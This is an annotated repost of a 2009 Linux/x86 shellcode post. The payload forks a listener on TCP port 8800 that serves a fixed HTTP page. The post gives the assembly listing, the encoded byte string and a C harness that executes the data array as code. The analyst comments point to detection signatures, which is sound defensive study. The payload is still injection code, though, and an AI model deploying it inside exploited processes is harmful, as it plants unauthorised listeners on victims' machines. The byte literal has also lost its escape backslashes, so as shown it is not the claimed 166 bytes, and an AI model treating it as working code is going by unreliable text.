# Title : linux/x86 shellcode that forks a HTTP Server on port tcp/8800 166 bytes
# Published : 2009-09-15
# Author : XenoMuta
/*
_ __ __ ___ __
| |/ /__ ____ ____ / |/ /_ __/ /_____ _
| / _ / __ / __ / /|_/ / / / / __/ __ `/
/ / __/ / / / /_/ / / / / /_/ / /_/ /_/ /
/_/|____/_/ /_/____/_/ /_/__,_/__/__,_/
xenomutax40phreakerx2enet
http://xenomuta.tuxfamily.org/ - Methylxantina 256mg
Description:
a Linux/x86 shellcode that forks an HTTP server on port tcp/8800
OS: Linux
Arch: x86
Length: 166 bytes
Author: XenoMuta
hola at:
str0k3, garay, fr1t0l4y, emra.
- God bless you all -
==== SOURCE CODE ====
# Analyst annotation of the listing (GAS/AT&T, i386 Linux, int 0x80 ABI:
# eax = syscall number, ebx/ecx/edx = first three arguments, only eax is
# written back).  The layout is position-dependent: the jz/jmp displacements,
# the call/pop fetch of the response string and the hand-encoded byte array
# further down all assume exactly this instruction sequence.
# i386 syscall numbers used here: 1 exit, 2 fork, 4 write, 6 close,
# 0x66 (102) socketcall.  All sub-call selection goes through the
# 'socketcall' helper, which bumps %bl by one before the syscall.
.globl _start
_start:
xor %eax, %eax
mov $0x02, %al                  # eax = 2: fork
int $0x80
test %eax, %eax
jz socket                       # child (eax == 0) becomes the server
xor %eax, %eax
incb %al                        # eax = 1: exit -- the original process leaves,
int $0x80                       # the child keeps running; ebx (status) is not set
txt:                            # entered only via 'call txt' from the write path
pop %ecx                        # ecx = address of the .string the call pushed
movb $27, %dl                   # edx = 27 = length of that string; edx is 0 on
                                # this path (zeroed at bind:, never written since)
int $0x80                       # eax is still 4 here: write(client, txt, 27)
close:
movb $0x6, %al                  # eax = 6: close (eax was the write() result;
                                # only al is set, so this relies on that result's
                                # upper bytes being zero)
mov %esi, %ebx                  # ebx = client fd saved in esi at fork:
int $0x80
exit:
mov $0x01, %al                  # eax = 1: exit, again only if close() returned 0
xor %ebx, %ebx                  # status 0
int $0x80
socketcall:                     # helper: callers push the argument block, then 'call'
pop %esi                        # esi = return address; this helper never uses ret
mov $0x66, %al                  # eax = 0x66 = 102: socketcall
incb %bl                        # ebx = sub-call number; each caller leaves ebx one below it
mov %esp, %ecx                  # ecx = pointer to the pushed argument block
int $0x80
jmp *%esi                       # back to the caller; the pushed args stay on the stack
socket:
cltd                            # edx = 0 (eax is 0 here: fork child)
xor %eax, %eax
xor %ebx, %ebx                  # bl becomes 1 (SYS_SOCKET) inside socketcall
push $0x6                       # IPPROTO_TCP
push $0x1                       # SOCK_STREAM
push $0x2                       # AF_INET
call socketcall                 # eax = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
bind:
mov %eax, %edi                  # edi = listening socket, kept for the whole loop
xor %edx, %edx
push %edx                       # sin_addr = 0 (INADDR_ANY)
pushw $0x6022                   # sin_port: bytes 22 60 in memory = 0x2260 = 8800 (network order)
pushw %bx                       # sin_family taken from %bx, which holds 1 at this point
                                # NOTE(review): 1 is not AF_INET; kernels that validate
                                # sin_family in inet_bind may reject this -- confirm
mov %esp, %ecx                  # ecx = &sockaddr (only 8 bytes written; sin_zero is whatever
                                # already lies above on the stack)
push $0x10                      # addrlen = 16
push %ecx
push %edi
call socketcall                 # bl -> 2 (SYS_BIND): bind(edi, &addr, 16)
listen:
inc %bl                         # ebx = 3, so socketcall's incb yields 4 (SYS_LISTEN)
push $0x05                      # backlog
push %edi
call socketcall                 # listen(edi, 5)
accept:
xor %ecx, %ecx
push %edx                       # addrlen = NULL (edx is 0)
push %edx                       # addr = NULL
push %edi
call socketcall                 # bl -> 5 (SYS_ACCEPT): eax = accept(edi, NULL, NULL)
fork:
mov %eax, %esi                  # esi = accepted client fd
xor %eax, %eax
mov $0x02, %al                  # fork once per connection
int $0x80
test %eax, %eax
jz write                        # child answers the request
xor %eax, %eax
mov $0x06, %al                  # parent: close(esi), its copy of the client fd
mov %esi, %ebx
int $0x80
xor %eax, %eax
xor %ebx, %ebx
mov $0x04, %bl                  # ebx = 4 so the next socketcall is accept (5) again
jmp accept                      # parent loops forever; children are never reaped
                                # (no wait/waitpid anywhere in the listing)
write:
mov %esi, %ebx                  # ebx = client fd
mov $0x04, %al                  # eax = 4: write (eax is 0 in the fork child)
call txt                        # pushes the address of the string below, txt: pops it
.string "HTTP/1.0 200rnrn<h1>:)</h1>"
# The 0d 0a 0d 0a in the byte array below show this was "\r\n\r\n" (27 bytes
# including the status line and the <h1> body); the backslashes were lost
# when the page was extracted.  This fixed ASCII tail and the port bytes
# 22 60 are the stable constants of the payload for signature purposes.
==== SOURCE CODE ====
*/
/* The listing above, hand-encoded, as executed by the harness below.
 * NOTE(review): every escape in this literal appears to have lost its
 * backslash in extraction ("x31xc0..." instead of \x.. escapes), so as
 * written it is plain ASCII text and strlen() would not report the
 * 166 bytes the page claims.  The trailing run 48 54 54 50 ... 3e is the
 * ASCII "HTTP/1.0 200\r\n\r\n<h1>:)</h1>" response and 22 60 is the
 * listening port 8800 in network byte order -- the stable constants a
 * detection signature for this payload can key on. */
char shellcode[] = "x31xc0xb0x02xcdx80x85xc0x74x22x31xc0xfexc0xcdx80x59xb2x1bxcdx80xb0x06x89xf3xcdx80xb0x01x31xdbxcdx80x5exb0x66xfexc3x89xe1xcdx80xffxe6x99x31xc0x31xdbx6ax06x6ax01x6ax02xe8xe5xffxffxffx89xc7x31xd2x52x66x68x22x60x66x53x89xe1x6ax10x51x57xe8xcfxffxffxffxfexc3x6ax05x57xe8xc5xffxffxffx31xc9x52x52x57xe8xbbxffxffxffx89xc6x31xc0xb0x02xcdx80x85xc0x74x10x31xc0xb0x06x89xf3xcdx80x31xc0x31xdbxb3x04xebxdax89xf3xb0x04xe8x85xffxffxffx48x54x54x50x2fx31x2ex30x20x32x30x30x0dx0ax0dx0ax3cx68x31x3ex3ax29x3cx2fx68x31x3e";
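/* Test harness from the original post: prints the payload length, then
 * jumps into the char array above as if it were code.
 * NOTE(review): printf() and strlen() are used without <stdio.h> /
 * <string.h> in the page as shown -- confirm the original included them.
 * NOTE(review): calling into a writable data array only works when the
 * data segment is executable; on a W^X / NX-enforcing build this call
 * faults instead of running -- confirm build flags before relying on it.
 * Returns 0 if the payload ever returns (it exits via syscall, so it
 * normally does not). */
int main(void)
{
    /* %zu matches strlen()'s size_t return (the original used %d); the
     * newline escape had apparently been lost in extraction ("bytesn"). */
    printf("Length: %zu bytes\n", strlen(shellcode));
    /* Reinterpret the array as a function and enter it (original harness). */
    int (*sc)(void) = (int (*)(void))shellcode;
    sc();
    return 0;
}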